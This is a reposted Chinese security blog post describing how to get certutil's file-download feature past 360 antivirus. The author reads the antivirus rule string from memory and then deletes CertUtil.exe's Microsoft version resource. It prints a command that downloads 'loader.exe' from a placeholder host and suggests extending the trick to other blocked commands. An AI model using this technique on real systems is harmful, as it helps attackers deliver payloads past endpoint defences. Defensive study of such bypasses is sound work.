【免杀思路】被360殴打的那些日子

admin 2025年6月26日00:15:44评论4 views字数 863阅读2分52秒阅读模式
0x01 声明
本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!
0x02 Certutil在某杀软环境下利用
certutil下载文件的常见命令:
certutil -urlcache -split -f http://xxxxx/loader.exe
【免杀思路】被360殴打的那些日子
可想而知,在该杀软环境下是必定拦截的,下面我将分析其内存中存在规则进行绕过。
0x03 探究certutil免杀分析其规则库
首先打开火绒剑或者其他工具找到该杀软进程,搜索certutil.exe内存字符串。
【免杀思路】被360殴打的那些日子
【免杀思路】被360殴打的那些日子

 

|IN=CertUtil.exe|CN@=Microsoft Corporation|LOLBin=none|
从上一步中找到类似规则字符,但我们不知道字符含义,所以我们要根据其字符去内存中寻找其代表的意思。
【免杀思路】被360殴打的那些日子
【免杀思路】被360殴打的那些日子
经过整理,对照文本中的信息,我们就知道其规则的含义是什么意思:

 

IN=InternalName(内部名)CN=公司名LOLBin=白利用拦截
【免杀思路】被360殴打的那些日子
0x04 绕过规则检测免杀certutil

 

 

规则的含义中CertUtil.exe名字我们可以随意更改,LOLBin=none可以忽略,关键点就在于Microsoft Corporation中。Microsoft Corporation存在资源文件中,那我们是不是更改或者删除相关资源文件即可绕过。

把CertUtil.exe使用Resource_Hacker打开,删除版本信息。

【免杀思路】被360殴打的那些日子

删除后保存为新的CertUtil.exe,在杀软环境下使用certutil下载文件的常见命令

【免杀思路】被360殴打的那些日子

从上图实验来看,删除了Microsoft Corporation资源,杀软的规则就对比不上,我们成功绕过其检测。

0x05 针对其规则的拓展及思考

 

 

 

 

在某些情况下,我们是否可以根据其规则,来绕过该杀软去执行本来无法执行的相关敏感命令呢?针对性绕过。

本文首发先知社区:https://xz.aliyun.com/news/15309

原文始发于微信公众号(安全天书):【免杀思路】被360殴打的那些日子

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月26日00:15:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀思路】被360殴打的那些日子https://cn-sec.com/archives/4169537.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息